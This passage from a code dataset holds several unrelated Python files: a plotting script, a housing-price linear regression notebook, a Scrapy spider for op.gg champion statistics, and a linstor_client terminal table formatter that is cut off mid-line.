delta_xxxlist=[xxx_noerr[i+1]-xxx_noerr[i] for i in range(0,len(xxx_noerr)-1)]\n delta_xxx=round(sum(delta_xxxlist)/len(delta_xxxlist),4)\n print('delta_xxx :',delta_xxx)\n plt.plot(xxx_noerr,[j/source_sum/delta_xxx for j in yyy1_noerr],label=legenddict_hybrid[i]+'/'+str(round(yyysum/source_sum,4)))\nplt.legend(loc='upper left', shadow=True)\naxes = plt.gca()\naxes.set_xlim(axis_config[simulation_index][0])\naxes.set_ylim(axis_config[simulation_index][1])\nplt.yticks(axis_config[simulation_index][2])\nplt.xlabel(r\"horizontal coordinate/$\\mu$m\")\nplt.ylabel(\"sampled ray ratio/sampling step\")\nplt.title(hybrid_title[simulation_index]+'('+str(delta_xxx)+r'$\\mu$m step)')\nplt.show()","repo_name":"tumatu/OASYS_Workplace","sub_path":"Compare_SRW/plot_hybrid_slit_1m.py","file_name":"plot_hybrid_slit_1m.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6676894151","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.3.4\n# kernelspec:\n# display_name: 'Python 3.7.6 64-bit (''base'': conda)'\n# language: python\n# name: python37664bitbaseconda78814975a87e45dd93a41087a924c115\n# ---\n\nimport pandas as pd\n# %pylab inline\n\n# file_path = r\"../pre_processed_data/pre_processed.csv\"\nfile_path = r\"C:\\Users\\jason\\OneDrive\\Documents\\Jason\\NYC Data Science Academy\\projects\\machine_learning\\ghub_work_area\\pre_processed_data\\pre_processed.csv\"\n# import pre_processed file \npre_process_df = pd.read_csv(filepath_or_buffer=file_path, index_col=0, header=0)\npre_process_df.sample(5)\n\n# + pycharm={\"is_executing\": false}\nlen(pre_process_df.columns)\n\n# +\n# remove target variables from data frame\nX = pre_process_df.loc[:, pre_process_df.columns.difference([\"saleprice\", \"log_saleprice\"])]\n\ny = pre_process_df[\"saleprice\"]\ny_log = pre_process_df[\"log_saleprice\"]\n\nprint(X.shape)\nprint(y.shape)\ny_log.shape\n\n# +\n# train, test split with train set to 80%\n# A linear regression model will be evaluated first in the 
absence of regularization\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.2, random_state=42)\nX_train_log, X_test_log, y_train_log, y_test_log = train_test_split(X, y_log, test_size= 0.2, random_state=42)\n\n# +\nfrom sklearn.linear_model import HuberRegressor, LinearRegression\n# Evaluation of Huber regressor against SalePrice w/o log-transform \n# Huber regression is a linear model that is more robust to outliers than the standard model, which penalizes the model\n# for higher deviations.\n\nhr = HuberRegressor()\nhr.fit(X=X_train, y=y_train)\nprint(f\"Train R2 is {hr.score(X=X_train, y=y_train)}\")\nprint(f\"Test R2 is {hr.score(X=X_test, y=y_test)}\")\n# -\n\n# Standard regression w/o log transform \nlr = LinearRegression()\nlr.fit(X=X_train, y=y_train)\nprint(f\"Train R2 is {lr.score(X=X_train, y=y_train)}\")\nprint(f\"Test R2 is {lr.score(X=X_test, y=y_test)}\")\n\n# +\n# Standard regression w/log transform \nlr_log = LinearRegression()\nlr_log.fit(X=X_train_log, y=y_train_log)\nprint(f\"Train R2 is {lr_log.score(X=X_train_log, y=y_train_log)}\")\nprint(f\"Test R2 is {lr_log.score(X=X_test_log, y=y_test_log)}\")\n\n# There is a slight improvement (~2%) in the train R2 and test R2 utilizing log transform \n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# ## Model Evaluation - Linear Regression\n# ### The following section evaluates the random error, constant variance and normal distribution with mean 0 assumption of linear model in the context of the four initial models utilizing a residual plot from Yellowbrick.\n#\n# -\n\n# Residual Plot for Huber LR with no log-transform\nfrom yellowbrick.regressor import ResidualsPlot\nrpv_hr = ResidualsPlot(hr)\nrpv_hr.fit(X=X_train, y=y_train)\nrpv_hr.score(X=X_test, y=y_test)\nrpv_hr.poof()\n\nrpv_lr = ResidualsPlot(lr)\nrpv_lr.fit(X=X_train, y=y_train)\nrpv_lr.score(X=X_test, y=y_test)\nrpv_lr.poof()\n\n\n# Residual Plot for LR with log transform \nrpv_lr_log = ResidualsPlot(lr_log)\nrpv_lr_log.fit(X=X_train_log, y=y_train_log)\nrpv_lr_log.score(X=X_test_log, y=y_test_log)\nrpv_lr_log.poof()\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# ## Model Evaluation of Ordinary Least Squares -Log Transform\n# - Evaluation of log-transformed OLS model as the residuals plot appeared to satisfy most of the principal assumptions of linear regression. \n# -\n\nimport statsmodels.api as sm\nX_add_constant = sm.add_constant(X_train_log)\nols_log = sm.OLS(y_train_log, X_add_constant)\nans_log = ols_log.fit()\nprint(ans_log.summary())\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - based on the OLS review, several factors are deemed non-significant by the model (e.g., there is not enough evidience to support that they are important to predicting sales price). These preidctors are bedrooms, lotfrontage, and whether a home is a new home. \n# - There are several coefficients that on the surface do not appear to make sense - namely the negative coefficient associated with two_plus_cr_garabe, this coefficient is negative whereas the domain association with this feature being that a two car or more garage capacity is good for a house. \n# - The model will be recaliberated dropping these three features.\n# - homeage is being excluded in favor of remodelage due to its lower significance. 
\n# - garagecars is being dropped because there is an overalp between that variable and the \"two_plus_cr_garg\" feature\n\n# +\nX_train_log = X_train_log.loc[:, X.columns.difference([\"bedroomsabvgr\", \"lotfrontage\", \"newHome\", \"homeage\", \"garagecars\"])]\nX_test_log = X_test_log.loc[:, X.columns.difference([\"bedroomsabvgr\", \"lotfrontage\", \"newHome\", \"homeage\", \"garagecars\"])]\n\n\nlr_log.fit(X=X_train_log, y=y_train_log)\nlr_log.score(X=X_test_log, y=y_test_log)\nprint(f\"Train R2 is {lr_log.score(X=X_train_log, y=y_train_log)}\")\nprint(f\"Test R2 is {lr_log.score(X=X_test_log, y=y_test_log)}\")\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - The train and test R2 are very similar to the model (e.g., 90/89%) prior to dropping the four variables. \n# - The residual plot and stats model output will be evaluated to confirm that the prior assumptions still hold as well as to identify any other items to potentiall exclude before proceeding to cross-validation.\n#\n# -\n\nrpv_lr_log = ResidualsPlot(lr_log)\nrpv_lr_log.fit(X=X_train_log, y=y_train_log)\nrpv_lr_log.score(X=X_test_log, y=y_test_log)\nrpv_lr_log.poof()\n\nX_add_constant = sm.add_constant(X_train_log)\nols_log = sm.OLS(y_train_log, X_add_constant)\nans_log = ols_log.fit()\nprint(ans_log.summary())\n\n\n# - Evaluation of OLS for non-log LR\n\nX_add_constant_non_log = sm.add_constant(X_train)\nols = sm.OLS(y_train, X_add_constant_non_log)\nans = ols.fit()\nprint(ans.summary())\n\n# + pycharm={\"is_executing\": false}\n# Prediction error plot to further evaluate normality of residual distribution\nfrom yellowbrick.regressor import prediction_error\n\nvisualizer = prediction_error(lr_log, X_train_log, y_train_log)\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - qq plot of prediction error appears to follow in a straight line, which is indicative of a normally distributed error term.\n#\n\n# + pycharm={\"is_executing\": false}\nfrom yellowbrick.regressor import cooks_distance\n\ncd_visualizer = cooks_distance(X=X_train, y=y_train_log)\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# ## Cross Validation through YellowBrick\n# ### **Evaluation of R2 over 4-fold Cross-Validation**\n# - linear log model is evaluated via 4-k fold\n\n# +\nfrom sklearn.model_selection import KFold\n\nfrom yellowbrick.model_selection import CVScores\n\n# Instantiate the KFold settings\ncv = KFold(n_splits=4, random_state=42)\n\ncv_visualizer = CVScores(model=lr_log, cv=cv, scoring=\"r2\")\n\ncv_visualizer.fit(X=X_train_log, y=y_train_log) # fit data into visualizer \ncv_visualizer.poof()\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - Median cross-validation R2 score is 89% and fairly consistent. 
\n# - Evaluating next via sci-kit learn's model selection package\n#\n# -\n\n# ### **Evaluation of RMSE (Root Mean Square Error)**\n\n# +\nfrom sklearn.model_selection import cross_val_score\nlr_r2_scores = cross_val_score(estimator = lr_log, X = X_train_log, y = y_train_log, scoring = 'r2', cv= 4)\nlr_rmse = -1 * cross_val_score(estimator= lr_log, X = X_train_log, y = y_train_log, scoring = \"neg_root_mean_squared_error\", cv=4)\nlr_mse = -1 * cross_val_score(estimator= lr_log, X = X_train_log, y = y_train_log, scoring = \"neg_mean_squared_error\", cv=4)\nlr_mae = -1 * cross_val_score(estimator= lr_log, X = X_train_log, y = y_train_log, scoring = \"neg_median_absolute_error\", cv=4)\n\ndef display_cv_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard Deviation:\", scores.std())\n \nprint(\"CV scores for R2 are:\") \ndisplay_cv_scores(lr_r2_scores)\nprint(\"\")\nprint(\"CV scores for RMSE are:\")\ndisplay_cv_scores(lr_rmse)\nprint(\"\")\nprint(\"CV scores for MSE are:\")\ndisplay_cv_scores(lr_mse)\nprint(\"\")\nprint(\"CV scores for MAE are:\")\ndisplay_cv_scores(lr_mae)\n\n# +\ncv_rmse = KFold(n_splits=4, random_state=42)\n\n# note that scikit-learn's implementation of RMSE is negative root mean squared error \ncv_visualizer_rmse = CVScores(model=lr_log, cv=cv, scoring=\"neg_median_absolute_error\")\n\ncv_visualizer_rmse.fit(X=X_train_log, y=y_train_log) # fit data into visualizer \ncv_visualizer_rmse.poof()\n# -\n\n\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - Based upon cross-validation and test R2, we appear to have a strong and consistent predictor of housing prices.\n# - The mean average is .89, which is also the value of the test R2 on the 20% hold out test-set. The standard deviation is also fairly low (e.g., 1.3%), which indicates that our model is not overly sensitive to the input data set.\n#\n# -\n\n# ## VIF Evaluation\n#\n# - VIF (Variance Inflation Factor) is reviewed to determine if there is any multi-collinearity. Generally, any feature with a VIF value of 5 or higher is generally regarded as a feature that is likely to be co-linear with another feature or combination of other features in the model. \n\n# +\nfrom patsy import dmatrices\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nfeatures_vif = \"+\".join(X_train_log.columns)\n\nfeatures_target = pd.concat([X_train_log, y_train_log], axis=\"columns\")\n\ny_VIF, X_VIF = dmatrices('log_saleprice ~' + features_vif, features_target, return_type = \"dataframe\")\n\nvif = pd.DataFrame()\nvif[\"VIF Factor\"] = [variance_inflation_factor(X_VIF.values, i) for i in range(X_VIF.shape[1])]\nvif[\"features\"] = X_VIF.columns\n\nvif.round(1)\n\n# -\n\n# - There are no features with a VIF factor greater than 5, the general cutoff for multicollinearity \"concern.\" The highest VIF value are 3.1 and 3.2 for adj_ovr_qual and good_ament_ct, respctively.\n\n# ## Model Output as Picket Object\n# - Output of model object to be utilized in prediction\n\n# +\nfrom joblib import dump\n\n#dump(lr_log, '../model_files/lr_log_model.joblib')\ndump(lr_log, r\"C:\\Users\\jason\\OneDrive\\Documents\\Jason\\NYC Data Science Academy\\projects\\machine_learning\\ghub_work_area\\model_files\\lr_log_model.joblib\")\n# -\n\nlr_log.predict(X_test_log)\n\n\nX_test_log.columns\n\n# + [markdown] pycharm={\"name\": \"#%%\\n\"}\n# # Additonal Model Evaluation \n# ## **Feature Importance**\n# ### 1. 
Lasso Evaluation\n# - Relatively and on a holistic level, seeing which feature coefficients are \"pushed\" to zero via a Lasso Regularization can indicate the relative importance of those features to a model. \n# - To utilize a regularization method - even for evaluation purposes - it is general good practice to standardize the input variables first prior to fitting the model.\n# -\n\nfrom sklearn import preprocessing\nstd = preprocessing.StandardScaler()\nX_train_log_std = std.fit_transform(X_train_log)\n\n# +\nfrom sklearn import linear_model\nlasso_model = linear_model.LassoLarsCV(\n cv=4, max_n_alphas=10\n).fit(X_train_log_std, y_train_log)\nfig, ax = plt.subplots(figsize=(12, 8))\ncm = iter(\n plt.get_cmap(\"tab20\")(\n np.linspace(0, 1, X_train_log_std.shape[1])\n )\n)\nfor i in range(X_train_log_std.shape[1]):\n c = next(cm)\n ax.plot(\n lasso_model.alphas_,\n lasso_model.coef_path_.T[:, i],\n c=c,\n alpha=0.8,\n label=X_train_log.columns[i],\n )\n\nax.axvline(\n lasso_model.alpha_,\n linestyle=\"-\",\n c=\"k\",\n label=\"alphaCV\",\n)\n\nplt.ylabel(\"Regression Coefficients\")\nax.legend(X_train_log.columns, bbox_to_anchor=(1,1))\nplt.xlabel(\"alpha\")\nplt.title(\n \"Regression Coefficients Progression for Lasso Paths\"\n)\nfig.savefig(\n \"mlpr_lasso_w_bsmt_adj.png\",\n dpi=300,\n bbox_inches=\"tight\",\n)\n# -\n\n# - The visualization of the Lasso regularization with increasing alphas indicates that the most significant factors are building square feet, adjusted overall quality, good amenities count, total baths and bad amenities count.\n\n# ### 2. Mutual Information\n# - Scikit learn's mutual information score for regressions helps to quantifies the amount of information gained by including the feature listed. \n# - The value is bounded between 0 and 1. If the value is zero, there is no relationship between the target and the feature. \n\n# +\nfrom sklearn import feature_selection\n\nmic = feature_selection.mutual_info_regression(\n X_train_log, y_train_log\n)\n\nfig, ax = plt.subplots(figsize=(10, 8))\n(\n pd.DataFrame(\n {\"feature\": X_train_log.columns, \"vimp\": mic}\n )\n .set_index(\"feature\")\n .plot.barh(ax=ax)\n)\nfig.savefig(\"mutual_info.png\")\n# -\n\n# **Conclusions**\n# - This visualization largely confirms the same relatively most important features (e.g., square footage, overall quality) that the Lasso visualization conferred. It does appear to note that abnormal sales and single family home are not signficant factors, which a little harder to visually distill in the Lassso chart.\n\n# ### 3. SHAP (SHaply Additive exPlanations)\n# - The SHAP library for Python has several nice visualizations that help to inform how predictors influence the output of the model.\n# - The below summary chart helps us to see the global effect of features on the target log sales price. For example, high values of building sqft increase the model output and lower values by contrast lower the target variable.\n\n# +\nimport shap\nshap.initjs()\n\nexp = shap.LinearExplainer(model = lr_log, data=X_train_log)\nvals = exp.shap_values(X_train_log)\nfig, ax = plt.subplots(figsize=(6, 4))\nshap.summary_plot(vals, X_train_log)\nfig.savefig(\n \"shap_summary_plt_reduced.png\",\n bbox_inches=\"tight\",\n dpi=300,\n)\n# -\n\n# - Another method of more narrowly looking at overall feature importance versus inspection of how different value of a feature impact the model, which reflects the mean absoluate SHAP value. 
\n\nshap.summary_plot(vals, X_train_log, plot_type=\"bar\")\n\n# ** Conclusion **\n# - Similar to the Lasso and mutual information graphs - the SHAP summary plot of feature importance highlights the same top factors in terms of overall impact (sq footage, overall quality, total baths, good amentity count).\n\n# # Example Predictions (For Purposes of Presentation)\n\n# +\ny_test_log_predict = lr_log.predict(X_test_log)\ny_test_predict_Series = pd.DataFrame(data=y_test_log_predict, index=y_test_log.index, columns=[\"log_saleprice_predict\"])\n\ntest_set_w_predict = pd.concat([X_test_log, y_test_log, y_test_predict_Series], axis=\"columns\")\n# -\n\ntest_set_w_predict.sample(5)\n\ntest_set_w_predict[\"saleprice\"] = np.exp(test_set_w_predict[\"log_saleprice\"])\ntest_set_w_predict[\"saleprice_predict\"] = np.exp(test_set_w_predict[\"log_saleprice_predict\"])\ntest_set_w_predict[\"residual\"] = test_set_w_predict.saleprice - test_set_w_predict.saleprice_predict\n\n\ntest_set_w_predict.sample(5)\n\nfile_path_train = r\"C:\\Users\\jason\\OneDrive\\Documents\\Jason\\NYC Data Science Academy\\projects\\machine_learning\\ghub_work_area\\data\\train.csv\"\ntrain_df = pd.read_csv(file_path_train, header=0, index_col=0)\ntrain_df.loc[[1095, 68, 1216, 531, 1290], [\"YrSold\", \"YearRemodAdd\", \"YearBuilt\"]]\n\ntest_set_w_predict[[\"residual\"]].aggregate([mean, median, np.std])\n\ntest_set_w_predict[[\"residual\"]].hist()\nplt.xlabel(\"$ Dollars\")\nplt.ylabel(\"Count\")\nplt.title(\"Difference in Sale Price: Actual Less Predicted\")\nplt.savefig(\"Histogram_of_Residuals.png\")\n\ntest_set_w_predict[\"perc_miss\"] = test_set_w_predict[\"residual\"]/test_set_w_predict[\"saleprice\"]\n\ntest_set_w_predict[\"perc_miss\"].abs().median()\n\ntest_set_w_predict[\"perc_miss\"].abs().mean()\n\n\n","repo_name":"jwattier/nycdsa_housing_ml_project","sub_path":"code/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":15554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11063038615","text":"###################################################################################################\n#\n# MODULO: opgg.py\n# DESCRIPCIÓN: Este es el spider que efectuará el trabajo de webscraping sobre la web op.gg\n# AUTOR: Rubén Moya Vázquez\n# EMAIL: rmoyav@uoc.edu\n#\n###################################################################################################\n\nimport scrapy\nfrom lolScraper.items import Champion\nfrom lolScraper.config import *\n\nclass OpggSpider(scrapy.Spider):\n \"\"\"[summary]\n\n Args:\n scrapy ([type]): [description]\n\n Yields:\n [type]: [description]\n \"\"\"\n\n # Nombre del spider\n name = 'opgg'\n\n # Dominio al que accederá\n allowed_domains = DOMAINS\n\n # Servidores a los que accederá\n servers = SERVERS\n\n # Urls de inicio del crawling\n start_urls = [URL.format(server=x) for x in servers]\n\n def parse_champions(self, response):\n \"\"\"\n Esta funcion es la que efectuará la lectura y filtrado de los perfiles de los campeones\n de manera que podamos obtener los atributos que nos interesan\n\n Args:\n response (Response): La web con el perfil del campeón seleccionado en la request.\n Yields:\n scrapy.items.Champion : El objeto campeon obtenido de filtrar la respuesta.\n \"\"\"\n \n # Objeto que representa a nuestro campeon.\n champion = Champion()\n\n champion['server'] = response.url.split('/')[2].split('.')[0]\n\n # Nombre del campeón\n name = 
response.xpath(XPATHS_CHAMPION['name']).extract()\n if isinstance(name, list) and name:\n name = name[0]\n\n champion['name'] = name\n\n # Rol que desempeña en la partida\n position = response.xpath(XPATHS_CHAMPION['position']).extract()\n if isinstance(position, list):\n position = position[0]\n champion['position'] = position\n\n # Tier al que pertenece\n champion['tier'] = response.xpath(XPATHS_CHAMPION['tier']).extract()[0]\n \n\n rates = response.xpath(XPATHS_CHAMPION['rate']).extract()\n if isinstance(rates, list) and len(rates) == 2:\n # Ratio de victorias \n champion['win_rate'] = float(rates[0].split('%')[0])\n\n # Porcentaje de veces seleccionado\n champion['pick_rate'] = float(rates[1].split('%')[0])\n\n yield champion\n \n def parse(self, response):\n \"\"\"\n Función principal del spider. Su estructura y nombre vienen dados por defecto al crear\n el proyecto con scrapy. Su funcion es recorrer el listado de urls de los campeones y\n llamar a 'parse_champions' con cada respuesta obtenida.\n\n Args:\n response (Response): La web con el perfil del campeón seleccionado en la request.\n\n Yields:\n scrapy.Request: La petición a la url de cada campeón.\n \"\"\"\n champions = response.xpath(STEP).extract()\n for champ in champions:\n yield scrapy.Request(url='https://' + response.url.split('/')[2] + champ, callback=self.parse_champions)\n","repo_name":"rmoyav/TIPOLOGIA_PRA_1","sub_path":"lolScraper/lolScraper/spiders/opgg.py","file_name":"opgg.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70462838971","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport sys\nimport errno\nimport operator\nimport locale\nfrom linstor_client.consts import (\n DEFAULT_TERM_HEIGHT,\n DEFAULT_TERM_WIDTH,\n Color\n)\n\nPYTHON2 = True\n\nif sys.version_info > (3, 0):\n PYTHON2 = False\n unicode = str\n\n\n# TODO(rck): still a hack\nclass SyntaxException(Exception):\n pass\n\n\ndef get_terminal_size():\n def ioctl_GWINSZ(term_fd):\n term_dim = None\n try:\n import termios\n import struct\n import fcntl\n term_dim = struct.unpack(\n 'hh',\n fcntl.ioctl(term_fd, termios.TIOCGWINSZ, '1234')\n )\n except (ImportError, IOError, OSError):\n pass\n return term_dim\n # Assign the first value that's not a NoneType\n term_dim = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)\n if not term_dim:\n try:\n with os.open(os.ctermid(), os.O_RDONLY) as term_fd:\n term_dim = ioctl_GWINSZ(term_fd)\n except (AttributeError, IOError, OSError):\n pass\n try:\n (term_width, term_height) = int(term_dim[1]), int(term_dim[0])\n except (IndexError, TypeError):\n term_width = DEFAULT_TERM_WIDTH\n term_height = DEFAULT_TERM_HEIGHT\n return term_width, term_height\n\n\nclass TableHeader(object):\n ALIGN_LEFT = '<'\n ALIGN_RIGHT = '>'\n\n def __init__(self, name, color=None, align_column=ALIGN_LEFT, alignment_text=ALIGN_LEFT):\n \"\"\"\n Creates a new TableHeader object.\n\n :param str name:\n :param str color: color to use for this column\n :param str align_column:\n :param str alignment_text:\n \"\"\"\n self._name = name\n self._color = color\n self._align_column = align_column\n self._alignment_text = alignment_text\n\n @property\n def name(self):\n return self._name\n\n @property\n def color(self):\n return self._color\n\n @property\n def column_alignment(self):\n return self._align_column\n\n @property\n def text_alignment(self):\n return self._alignment_text\n\n\nclass 
Table(object):\n def __init__(self, colors=True, utf8=False, pastable=False):\n self.r_just = False\n self.got_column = False\n self.got_row = False\n self.groups = []\n self.header = []\n self.table = []\n self.coloroverride = []\n self._header_colors = False\n self.view = None\n self.showseps = False\n self.maxwidth = 0 # if 0, determine terminal width automatically\n if pastable:\n self.colors = False\n self.utf8 = False\n self.maxwidth = 78\n else:\n self.colors = colors\n self.utf8 = utf8\n\n def add_column(self, name, color=None, align_column=TableHeader.ALIGN_LEFT, just_txt=TableHeader.ALIGN_LEFT):\n self.got_column = True\n if self.got_row:\n raise SyntaxException(\"Not allowed to define columns after rows\")\n if align_column == TableHeader.ALIGN_RIGHT:\n if self.r_just:\n raise SyntaxException(\"Can not right align column more than once\")\n else:\n self.r_just = True\n\n if not self.colors:\n color = None\n\n self.header.append({\n 'name': name,\n 'color': color,\n 'align_column': align_column,\n 'just_txt': just_txt})\n\n def header_name(self, index):\n return self.header[index]['name']\n\n def add_header(self, header):\n \"\"\"\n Adds a table header\n :param TableHeader header:\n :return:\n \"\"\"\n return self.add_column(header.name, header.color, header.column_alignment, header.text_alignment)\n\n def add_headers(self, headers):\n \"\"\"\n Adds a list of table headers.\n :param list[TableHeader] headers: list of table headers\n :return:\n \"\"\"\n for hdr in headers:\n self.add_header(hdr)\n\n @classmethod\n def to_unicode(cls, t):\n if isinstance(t, str):\n if PYTHON2:\n return unicode(t, 'UTF-8')\n else:\n return t\n elif isinstance(t, unicode):\n return t\n else:\n if PYTHON2:\n return unicode(t)\n else:\n return str(t)\n\n def add_row(self, row):\n self.got_row = True\n if not self.got_column:\n raise SyntaxException(\"Not allowed to define rows before columns\")\n if len(row) != len(self.header):\n raise SyntaxException(\"Row len does not match headers\")\n\n coloroverride = [None] * len(row)\n for idx, c in enumerate(row[:]):\n if isinstance(c, tuple):\n color, text = c\n row[idx] = self.to_unicode(text)\n if self.colors:\n coloroverride[idx] = color\n else:\n row[idx] = self.to_unicode(row[idx])\n\n self.table.append(row)\n self.coloroverride.append(coloroverride)\n\n def add_separator(self):\n self.table.append([None])\n\n def set_show_separators(self, val=False):\n self.showseps = val\n\n def set_view(self, columns):\n self.view = columns\n\n def set_groupby(self, groups):\n if groups:\n assert (isinstance(groups, list))\n self.groups = groups\n\n @classmethod\n def _determine_column_width(cls, column_text):\n \"\"\"\n Returns the longest line in the column_text.\n\n :param str column_text: column text\n :return: Lenght of the longest line in the text\n :rtype: int\n \"\"\"\n maxline = 0\n for line in str(column_text).splitlines():\n maxline = max(len(line), maxline)\n return maxline\n\n @classmethod\n def _str_print(cls, output):\n \"\"\"\n Print and return output with attached new line.\n\n :param str output:\n :return: output + '\\n'\n :rtype: str\n \"\"\"\n print(output)\n return output + '\\n'\n\n @classmethod\n def _row_expand(cls, row):\n \"\"\"\n Expands a row with columns e.g.:\n [\"column1_line1\\ncolumn1_line2\", \"column2_line1\", \"column3_line1\\ncolumn3_line2\\ncolumn3_line3\"]\n\n to the following format:\n [\n [\"column1_line1\", \"column2_line1\", \"column3_line1\"],\n [\"column1_line2\", \"\", \"column3_line2\"],\n [\"\", \"\", 
\"column3_line3\"]\n ]\n :param list[str] row:\n :return:\n :rtype: list[list[str]]\n \"\"\"\n max_rows = 1\n\n # pre calculate table dimensions\n for column in row:\n max_rows = max(str(column).count('\\n') + 1, max_rows)\n\n if max_rows == 1: # small optimization\n return [row]\n\n multirow = [[\"\"] * len(row) for x in range(max_rows)] # create a pre filled table\n\n for cidx, column in enumerate(row):\n lines = str(column).splitlines()\n for idx, line in enumerate(lines):\n multirow[idx][cidx] = line\n\n return multirow\n\n def show(self, row_separator=True):\n output_table_str = ''\n # no view set, use all headers\n if not self.view:\n self.view = [h['name'] for h in self.header]\n\n if self.groups:\n self.view += [g for g in self.groups if g not in self.view]\n\n pcnt = 0\n for idx, c in enumerate(self.header[:]):\n if c['name'] not in self.view:\n pidx = idx - pcnt\n pcnt += 1\n self.header.pop(pidx)\n for row in self.table:\n row.pop(pidx)\n for row in self.coloroverride:\n row.pop(pidx)\n\n columnmax = [0] * len(self.header)\n if self.maxwidth:\n maxwidth = self.maxwidth\n else:\n term_width, _ = get_terminal_size()\n maxwidth = 110 if term_width > 110 else term_width\n\n hdrnames = [h['name'] for h in self.header]\n if self.groups and self.table:\n low_hdrnames = [h.lower() for h in hdrnames]\n group_bys = [low_hdrnames.index(g.lower()) for g in self.groups if g.lower() in low_hdrnames]\n for row in self.table:\n for idx in group_bys:\n try:\n row[idx] = int(row[idx])\n except ValueError:\n pass\n for idx, row in enumerate(self.table):\n row += [idx] # add table index for remap coloroverrides later\n orig_coloroverride = self.coloroverride[:]\n try:\n from natsort import natsorted\n self.table = natsorted(self.table, key=operator.itemgetter(*group_bys))\n except ImportError:\n self.table.sort(key=operator.itemgetter(*group_bys))\n\n # restore color overrides after sort\n for idx, row in enumerate(self.table):\n self.coloroverride[idx] = orig_coloroverride[row[-1]]\n # maybe remove the additional table index column, but it doesn't do harm\n\n lstlen = len(self.table)\n seps = set()\n for c in range(len(self.header)):\n if c not in group_bys:\n continue\n cur = self.table[0][c]\n for idx, l in enumerate(self.table):\n if idx < lstlen - 1:\n if self.table[idx + 1][c] != cur:\n cur = self.table[idx + 1][c]\n seps.add(idx + 1)\n\n if self.showseps:\n for c, pos in enumerate(sorted(seps)):\n self.table.insert(c + pos, [None])\n\n # calc max width per column and set final strings (with color codes)\n self.table.insert(0, [h.replace('_', ' ') for h in hdrnames])\n self.coloroverride.insert(0, [None] * len(self.header))\n\n # precalculate maximum column width\n multi_line_row = False\n for ridx, row in enumerate(self.table):\n if row[0] is None:\n continue\n for idx, col in enumerate(self.header):\n if not multi_line_row:\n multi_line_row = str(row[idx]).find(\"\\n\") >= 0\n columnmax[idx] = max(self._determine_column_width(row[idx]), columnmax[idx])\n\n # insert frames\n self.table.insert(0, [None])\n self.table.insert(2, [None])\n self.table.append([None])\n\n # build format string\n ctbl = {\n 'utf8': {\n 'tl': u'╭', # top left\n 'tr': u'╮', # top right\n 'bl': u'╰', # bottom left\n 'br': u'╯', # bottom right\n 'mr': u'╡', # middle right\n 'ml': u'╞', # middle left\n 'mdc': u'┄', # middle dotted connector\n 'msc': u'─', # middle straight connector\n 'pipe': u'┊',\n 'hr': u'═'\n },\n 'ascii': {\n 'tl': u'+',\n 'tr': u'+',\n 'bl': u'+',\n 'br': u'+',\n 'mr': u'|',\n 'ml': u'|',\n 'mdc': 
u'-',\n 'msc': u'-',\n 'pipe': u'|',\n 'hr': u'='\n }\n }\n\n enc = 'ascii'\n if self.utf8:\n locales = locale.getdefaultlocale()\n if len(locales) > 1 and locales[1] and isinstance(locales[1], str) and locales[1].lower() == 'utf-8':\n enc = 'utf8'\n\n try:\n data_idx = 0 # index of the actual data table, self.table was inserted with table separators\n space = maxwidth - sum(columnmax)\n header_size = len(self.header)\n table_size = len(self.table)\n for ridx, row in enumerate(self.table):\n if row[0] is None: # print a separator\n if ridx == 0: # top line\n l, m, r = ctbl[enc]['tl'], ctbl[enc]['msc'], ctbl[enc]['tr']\n elif ridx == table_size - 1: # bottom line\n l, m, r = ctbl[enc]['bl'], ctbl[enc]['msc'], ctbl[enc]['br']\n elif ridx == 2:\n l, m, r = ctbl[enc]['ml'], ctbl[enc]['hr'], ctbl[enc]['mr']\n else: # mid separators\n l, m, r = ctbl[enc]['ml'], ctbl[enc]['mdc'], ctbl[enc]['mr']\n row_sep = l + m * (sum(columnmax) + (3 * header_size) - 1) + r\n\n if self.r_just and len(row_sep) < maxwidth:\n output_table_str += self._str_print(l + m * (maxwidth - 2) + r)\n else:\n output_table_str += self._str_print(row_sep)\n else:\n fstr = ctbl[enc]['pipe'] # prepare the format string per row, this allows colors per cell\n for idx, col in enumerate(self.header): # loop columns\n if col['align_column'] == TableHeader.ALIGN_RIGHT:\n space_and_overhead = space - (header_size * 3) - 2\n if space_and_overhead >= 0:\n fstr += u' ' * space_and_overhead + ctbl[enc]['pipe']\n\n field_format = u'{' + str(idx) + u':' + col['just_txt'] + str(columnmax[idx]) + u'}'\n\n fstr += u' '\n # add color, if set\n if self.coloroverride[data_idx][idx] or col['color'] and (self._header_colors or data_idx > 0):\n if self.coloroverride[data_idx][idx]:\n color = self.coloroverride[data_idx][idx]\n else:\n color = col['color']\n fstr += color + field_format + Color.NONE\n else:\n fstr += field_format\n fstr += u' ' + ctbl[enc]['pipe']\n\n data_idx += 1 # we wrote a data row, so increase the data_idx\n # split rows into row lines (for multiline support)\n for singlerow in self._row_expand(row):\n output_table_str += self._str_print(fstr.format(*singlerow))\n\n # if multiline rows and not disabled draw row separators between real rows\n if 2 < ridx < table_size - 2:\n if multi_line_row and row_separator:\n row_sep = ctbl[enc]['ml'] + ctbl[enc]['mdc']\\\n * (sum(columnmax) 